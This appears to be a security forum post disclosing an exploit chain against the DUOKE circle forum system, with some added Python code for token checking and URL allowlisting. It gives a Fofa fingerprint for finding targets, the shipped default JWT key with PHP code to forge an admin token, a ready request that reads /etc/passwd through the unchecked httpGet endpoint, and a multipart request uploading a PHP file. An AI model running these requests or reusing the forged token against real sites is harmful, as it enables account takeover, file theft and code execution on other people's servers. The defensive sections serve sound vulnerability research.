Duoke Circle Forum Community System: Front-End File Read + File Upload Vulnerabilities - Network Security Forum - Network Security - 阻击者联盟

Duoke Circle Forum Community System: Front-End File Read + File Upload Vulnerabilities

0x00 Introduction

DUOKE Duoke Circle Forum Community System ships with a complete PHP back end. Features: mini-program (WeChat) authorized login, H5 and app versions, phone-number login, posting, creating circles and publishing events. Circle owners can pin and recommend posts; follows, fans, likes and so on. It can serve as a Tieba-style circle forum or a Xiaohongshu-style self-media platform.

Fofa fingerprint:

"/static/index/js/jweixin-1.2.0.js"


Framework: ThinkPHP 6.0.12, Debug: True

0x01 Front-End JWT Forgery Vulnerability

The JWT configuration lives in /config/jwt.php, and in practice nobody changes it:

return [
    'key' => '966285d811d508e0383235c457d79391',
    'expire'  => 7
];

Then just write a bit of PHP to forge a JWT. The code is as follows:

<?php
// Forge an HS256 JWT using the default 'key' shipped in /config/jwt.php.
function base64url_encode($data)
{
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

$key     = '966285d811d508e0383235c457d79391'; // default key from /config/jwt.php
$header  = ['typ' => 'JWT', 'alg' => 'HS256'];
// Impersonate user id 1. Note: the token that /api/login hands out (see the
// requests below) encodes uid as the integer 1, i.e. ['uid' => 1].
$payload = ['uid' => '1'];

$segments   = [];
$segments[] = base64url_encode(json_encode($header));
$segments[] = base64url_encode(json_encode($payload));
$signing_input = implode('.', $segments);

// HMAC-SHA256 over "header.payload" with the leaked key, raw binary output
$signature  = hash_hmac('sha256', $signing_input, $key, true);
$segments[] = base64url_encode($signature);

$jwt = implode('.', $segments);
echo $jwt;

If you can't be bothered to build one, just request /api/login: it directly outputs a token for uid 1. This code really is something else.

With a valid JWT in hand, everything under the api controller becomes reachable: file read, file upload and the rest can all be hit.
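
To make the point of this section concrete, here is an added Python example (not code from this write-up or from the DUOKE project) that reimplements the forging routine above and adds the check a tester or defender actually wants: does a captured token verify under the shipped default key? The `verify_hs256` function also pins the algorithm to HS256 before checking the MAC, which is how the server side should be written. The key value is the one from /config/jwt.php above; the function names and helpers are the example's own.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Default signing key from the shipped /config/jwt.php (quoted in the write-up above).
DEFAULT_KEY = "966285d811d508e0383235c457d79391"


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as RFC 7515 requires for JWT segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    """Inverse of b64url_encode; restores the padding Python's decoder needs."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def forge_hs256(payload: dict, key: str) -> str:
    """Mint an HS256 token for an arbitrary payload, mirroring the PHP snippet above."""
    header = {"typ": "JWT", "alg": "HS256"}
    # Compact separators reproduce PHP's json_encode output byte for byte.
    segments = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(payload, separators=(",", ":")).encode()),
    ]
    signing_input = ".".join(segments).encode("ascii")
    sig = hmac.new(key.encode(), signing_input, hashlib.sha256).digest()
    segments.append(b64url_encode(sig))
    return ".".join(segments)


def verify_hs256(token: str, key: str) -> Optional[dict]:
    """Return the payload if token is a well-formed HS256 JWT signed with key, else None.

    The algorithm is pinned to HS256 before the MAC is checked, so a client cannot
    downgrade to "none" or substitute another algorithm.
    """
    try:
        h_seg, p_seg, s_seg = token.split(".")
        header = json.loads(b64url_decode(h_seg))
        if header.get("alg") != "HS256":
            return None
        expected = hmac.new(key.encode(), f"{h_seg}.{p_seg}".encode("ascii"),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s_seg)):
            return None
        return json.loads(b64url_decode(p_seg))
    except ValueError:  # bad segment count, bad base64, bad JSON, bad UTF-8
        return None


def signed_with_default_key(token: str) -> bool:
    """Triage helper: does a captured token still validate under the shipped default key?"""
    return verify_hs256(token, DEFAULT_KEY) is not None


if __name__ == "__main__":
    forged = forge_hs256({"uid": 1}, DEFAULT_KEY)
    print(forged)
    print("accepted under default key:", signed_with_default_key(forged))
    print("payload:", verify_hs256(forged, DEFAULT_KEY))
```

Run `signed_with_default_key()` against a token captured from a live site: a `True` result means the operator never rotated the key and every account on that instance can be impersonated. The fix on the server is the same two lines `verify_hs256` shows, a per-deployment random key and an algorithm pin, plus honouring the `expire` setting the config already carries.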

0x02 Front-End Arbitrary File Read Vulnerability

The old file-read bug was patched, but the controller at /app/api/controller/User.php still has a curl_exec that can read files. It only needs a token, and the JWT bug above hands you one (you don't even have to build it: the key is normally the shipped default, nobody changes it).

public function httpGet($url) {
  // $url comes straight from the request (?url=...) and is never validated:
  // no scheme allowlist, so file://, gopher://, dict:// and friends are accepted.
  $curl = curl_init();
  curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($curl, CURLOPT_TIMEOUT, 500);
  // TLS verification is switched off as well
  curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  curl_setopt($curl, CURLOPT_URL, $url);
  $res = curl_exec($curl);
  curl_close($curl);
  // the raw response body (or the file's contents) goes back to the caller
  return $res;
}

Payload (the token does not need changing; with the default key it works on every deployment):

GET /api/user/httpGet?url=file:///etc/passwd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Host: 127.0.0.1
Proxy-Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjF9.VQtQaEk7rvMOGHV5dBlNjWpWtBL-gFNpKBMNXTX3_ns
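
The root cause in httpGet is that neither the scheme nor the host of $url is checked before curl fetches it. Below is an added Python example, not the project's code, of the allowlist check a fixed endpoint needs: only http/https, no userinfo, and every address the host resolves to must be public. The scheme check is what stops file:///etc/passwd (and gopher://, dict://, php://); the address check is what stops 127.0.0.1, 10.x and 169.254.169.254. The DNS table, hostnames and URLs are constructed for the demonstration, and `fake_resolver` stands in for real DNS so the block runs offline.

```python
import ipaddress
import socket
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

# A resolver maps a hostname to the IP address strings it resolves to.
Resolver = Callable[[str], Iterable[str]]


def system_resolver(host: str) -> List[str]:
    """Resolve via the OS (A and AAAA); literal IPs come back unchanged."""
    try:
        return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})
    except socket.gaierror:
        return []


def is_public_address(ip_text: str) -> bool:
    """True only for globally routable unicast addresses.

    Rejects loopback, RFC 1918 / ULA, link-local (including the 169.254.169.254
    metadata endpoint), multicast and the unspecified address.
    """
    ip = ipaddress.ip_address(ip_text.split("%")[0])  # drop any IPv6 scope id
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 must be judged as 127.0.0.1
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url: str, resolver: Resolver = system_resolver) -> str:
    """Return url if it is safe to fetch server-side, else raise ValueError."""
    parts = urlsplit(url)
    # 1. Scheme allowlist: this alone kills file://, gopher://, dict://, php://
    if parts.scheme.lower() not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL is not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    # 2. Resolve first, then judge every answer (A and AAAA), not just the first.
    addrs = list(resolver(host))
    if not addrs:
        raise ValueError(f"host does not resolve: {host!r}")
    for addr in addrs:
        if not is_public_address(addr):
            raise ValueError(f"{host!r} resolves to non-public address {addr}")
    return url


def is_allowed(url: str, resolver: Resolver = system_resolver) -> bool:
    try:
        check_outbound_url(url, resolver)
        return True
    except ValueError:
        return False


# Constructed DNS answers for an offline demonstration; not real records.
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "intranet.example.com": ["10.0.0.5"],
    "rebind.example.com": ["93.184.216.34", "127.0.0.1"],  # mixed answer set
}


def fake_resolver(host: str) -> List[str]:
    """Stand-in for DNS: table lookup, with literal IPs passed through."""
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    try:
        return [str(ipaddress.ip_address(host))]
    except ValueError:
        return []


if __name__ == "__main__":
    for u in [
        "https://cdn.example.com/avatar.jpg",
        "file:///etc/passwd",  # the payload used above
        "gopher://127.0.0.1:6379/_PING",
        "http://169.254.169.254/latest/meta-data/",
        "http://[::ffff:127.0.0.1]/",
        "http://rebind.example.com/",
    ]:
        print(f"{'ALLOW' if is_allowed(u, fake_resolver) else 'BLOCK':5} {u}")
```

On the PHP side the scheme half of this check is a one-liner, curl_setopt($curl, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS), with the same value for CURLOPT_REDIR_PROTOCOLS if redirects are ever followed. The host half has to be applied to the resolved address, and because a name can change between this check and curl's own lookup (DNS rebinding), the robust pattern is to connect to the vetted IP and send the original Host header, or to resolve once and pin that address for the request.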


0x03 Front-End Arbitrary File Upload Vulnerability

Some sites may have patched this one. Send the request below as-is to upload an arbitrary file; remember to include the token.

POST /index.php/api/User/up_img HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary03rNBzFMIytvpWhy
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/index.php/api/User/up_img
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjF9.VQtQaEk7rvMOGHV5dBlNjWpWtBL-gFNpKBMNXTX3_ns

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
